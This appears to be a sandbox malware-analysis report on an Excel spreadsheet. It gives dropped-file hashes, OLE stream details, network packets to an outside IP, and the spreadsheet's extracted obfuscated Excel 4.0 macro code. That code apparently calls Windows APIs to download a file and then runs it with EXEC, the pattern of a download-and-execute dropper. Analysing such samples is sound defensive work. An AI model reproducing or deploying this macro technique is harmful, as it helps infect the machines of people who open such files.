                                            SHA-256:D3D3EDB8075B2678ADC74A2EDFCC94C4266373DF6F7D3A72DB363C2243B5FE43
                                            SHA-512:8080C647D99FB5C4AA29EC3079710B995DED88324CD55F114665FBC9BA223DCAB5B97E2D242904F5F26F2D88AEE084970A86DAD98A90E6762343C2618D2B842D
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ....`....TQ.W...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                            C:\Users\user\AppData\Local\Temp\1DDE0000
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):315386
                                            Entropy (8bit):7.985545482118191
                                            Encrypted:false
                                            SSDEEP:6144:63ZrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MT:6JFPM8R3AsB+bjej/9cA
                                            MD5:AE999A25BAA4ADC92B17AB2F2216ED17
                                            SHA1:1F89A708B1499E81EE996A0712CFE00139756195
                                            SHA-256:0E40D0F29221A3C2C618B0763A8D56BA5F878AF6C162914D90DF1F5F1923202A
                                            SHA-512:83222B6BA8C208B5C14B1DED0E6500E8351F839A03710B8B5FC5E7AAA41B70B50716C45FF63C9E34601B99082AB5D0715E7803C8AF6F05ECBACF57AAF4D805A8
                                            Malicious:false
                                            Reputation:low
                                            Preview: .V.N.0..4..y;J\@B.QS....A.>..o..~.6..=.nH..4DTb..s......j.U..>HkjrV.H..[!MS...?.OR..`.......Z|.6..:...M.I...Ei.-h.*.....z."...:...z>.]RnM...8.b..V.Q..f..wN...z.^...sNI."..OF.DJ.ZI...G..Up...-@.r^.......@.AMg.....sz~..A..d.f.C..\Jh..?0.w....9t..8.^.(n......F.g..Kk..q....%l8.*'Vi..1l...4...(ed..t........K.d.....T#}.{.Lo.+........"...&.2=..2.=../.^*..,#..q3...._.fD0..p.9..).....M6'7.{...9Y....s.Ft9S...}........g.z...E....v..........rh....YM..tZHM[.8.M.O.........PK..........!.C.T.....e.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\CabE754.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):58936
                                            Entropy (8bit):7.994797855729196
                                            Encrypted:true
                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                            C:\Users\user\AppData\Local\Temp\TarE755.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):152533
                                            Entropy (8bit):6.31602258454967
                                            Encrypted:false
                                            SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                            MD5:D0682A3C344DFC62FB18D5A539F81F61
                                            SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                            SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                            SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 12:53:42 2020, atime=Sun Nov 29 12:53:42 2020, length=12288, window=hide
                                            Category:dropped
                                            Size (bytes):867
                                            Entropy (8bit):4.472593618392289
                                            Encrypted:false
                                            SSDEEP:12:85Qd8FcLgXg/XAlCPCHaXgzB8IB/O7X+WnicvbPbDtZ3YilMMEpxRljKYyTdJP9O:85bFK/XTwz6IgYePDv3qnqrNru/
                                            MD5:1D464A55B57E187413A9A4B3089C3896
                                            SHA1:2A503A5EBE20C1F1D1434E7260AB260D1A84C245
                                            SHA-256:2D215FAD2290D067674C9D9213DBAE834B96804821F6B933EB281D732E5C63B0
                                            SHA-512:E091797D8183154CB75812F62C453F286A7E4DFCBC9AFF2D3CCDD2B4EE96302614C1259B95CCA511BAB665FB9F142E51695BB17E33752A2D865CA8A6D4D99C14
                                            Malicious:false
                                            Reputation:low
                                            Preview: L..................F...........7G...M1.W....M1.W....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Q.n..Desktop.d......QK.X}Q.n*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\965969\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......965969..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1333887362.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Sun Nov 29 12:53:42 2020, atime=Sun Nov 29 12:53:42 2020, length=338432, window=hide
                                            Category:dropped
                                            Size (bytes):4236
                                            Entropy (8bit):4.507809041546108
                                            Encrypted:false
                                            SSDEEP:96:8wM/XLInrqQh2wM/XLInrqQh2wM/XLInrqQh2wM/XLInrqQ/:8RInuQERInuQERInuQERInuQ/
                                            MD5:19F00B0C034770F2294D363442D62572
                                            SHA1:7240474719CA50C2D8F655DE3A65B58CA19BE109
                                            SHA-256:31F1D8FDA785EE771649E2C28B2B579DDDA7C8B3DED71C864081169B9243A71A
                                            SHA-512:53A247C8DFCFEC4229A74C9F3AAA44886450A3ECD87B7AC081DDC56043A18CAD4D8F9E677A03FE297CC92A6E841AAE051427EF98CF80CCA505226F9199ED5365
                                            Malicious:false
                                            Reputation:low
                                            Preview: L..................F.... ...$l...{...M1.W....?.W....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..,..}Q.n .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.3.3.3.8.8.7.3.6.2...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\965969\Users.user\Desktop\document-1333887362.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.3.3.3.8.8.7.3.6.2...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......965969..........D_....3N.
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):232
                                            Entropy (8bit):4.711116806497415
                                            Encrypted:false
                                            SSDEEP:6:dj6Y9L8QtEL8QHY9L8QtEL8QHY9L8QtEL8QHY9L8Qz:dmBBBk
                                            MD5:77103A9EE13787B073EC2822F489D897
                                            SHA1:1C3749C035F85F8D06637BC671E6DD6B00ED8AFC
                                            SHA-256:8CE14A68D88B3D63F524BCC038D5BC760C5FD0EEB9554C7E7604C506803AE75E
                                            SHA-512:3E104CBE6F211316B06646A83EFB9370DD669A6E571C31F01F1C819748DD927D2A41A0E203C627BAA6EF23A4DD4EFA2C23D8D46ED71331AE3963FD789537D57E
                                            Malicious:false
                                            Reputation:low
                                            Preview: Desktop.LNK=0..[xls]..document-1333887362.LNK=0..document-1333887362.LNK=0..[xls]..document-1333887362.LNK=0..document-1333887362.LNK=0..[xls]..document-1333887362.LNK=0..document-1333887362.LNK=0..[xls]..document-1333887362.LNK=0..
                                            C:\Users\user\Desktop\CEDE0000
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Applesoft BASIC program data, first line number 16
                                            Category:dropped
                                            Size (bytes):398469
                                            Entropy (8bit):7.194972622943385
                                            Encrypted:false
                                            SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdX:qizo8RnsIROnr6n75YtsrG
                                            MD5:79DFFFCD2E36C3A63F3F0491DE76C6E1
                                            SHA1:FBD8D831897E709B544A37F4AA19364742251FEA
                                            SHA-256:810F3468CE48AD355AFF9ECF73CCBBAFC99C517F89C3D59759B4C572EAFEAD2D
                                            SHA-512:B36EEBEFD15A0DAA46A2EBE06129A41C7E2425C355F37656A7CFA557942C03EB4EEE7406CB445C30E3A0034EA80114DF7DAE67A5F6D5AB7190556540519340A5
                                            Malicious:false
                                            Reputation:low
                                            Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:48:42 2020, Security: 0
                                            Entropy (8bit):7.5234718640432785
                                            TrID:
                                            • Microsoft Excel sheet (30009/1) 78.94%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                            File name:document-1333887362.xls
                                            File size:338944
                                            MD5:d73c6ac8fe30f97b9751740e5990cf40
                                            SHA1:66f33cf632df26d83ef1ecac6df9a0dd7471adda
                                            SHA256:943972111562181bc947f598310ba1868a32a18ad8344419af1e4654e472c49a
                                            SHA512:7da7a36a1cd8be880225d0fde0708719ebffb7e8004e0f9bc48855b8d1731afcb9f22f1e9b5f15ce2a46a05940a16c20b67b60a9459b2cc2095ad1b6d9ba379a
                                            SSDEEP:6144:QcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTU:4izo8RnsIROnr6n75YN
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea286a4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "document-1333887362.xls"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Excel
                                            Encrypted Document:False
                                            Contains Word Document Stream:False
                                            Contains Workbook/Book Stream:True
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1251
                                            Author:
                                            Last Saved By:
                                            Create Time:2006-09-16 00:00:00
                                            Last Saved Time:2020-11-26 09:48:42
                                            Creating Application:Microsoft Excel
                                            Security:0

                                            Document Summary

                                            Document Code Page:1251
                                            Thumbnail Scaling Desired:False
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams

                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.367004077607
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.25260634675
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326317
                                            General
                                            Stream Path:Workbook
                                            File Type:Applesoft BASIC program data, first line number 16
                                            Stream Size:326317
                                            Entropy:7.65589543371
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                            Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                            Macro 4.0 Code

                                            CALL("Ke"&????2!IE349&"32", "Cr"&????2!IG377&"yA", "JCJ", ????2!HV347&????2!HV362, 0)
                                            
                                            CALL("U"&????2!IG367, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HV347&????2!HV362&????2!HV376, 0, 0)
                                            
                                            =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!IE349&""32"",""Cr""&????2!IG377&""yA"",""JCJ"",????2!HV347&????2!HV362,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                            "=CALL(""Ke""&????2!IE349&""32"",""Cr""&????2!IG377&""yA"",""JCJ"",????2!HV347,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                            "=CALL(""U""&????2!IG367,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HV347&????2!HV362&????2!HV376,0,0)"=EXEC(????3!W36&????2!HV347&????2!HV362&????2!HV376)=HALT()

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 29, 2020 05:53:43.580777884 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:43.709427118 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:43.709618092 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:43.717777014 CET49165443192.168.2.2267.212.179.162
                                            Nov 29, 2020 05:53:43.846256018 CET4434916567.212.179.162192.168.2.22
                                            Nov 29, 2020 05:53:43.849687099 CET4434916567.212.179.162192.168.2.22
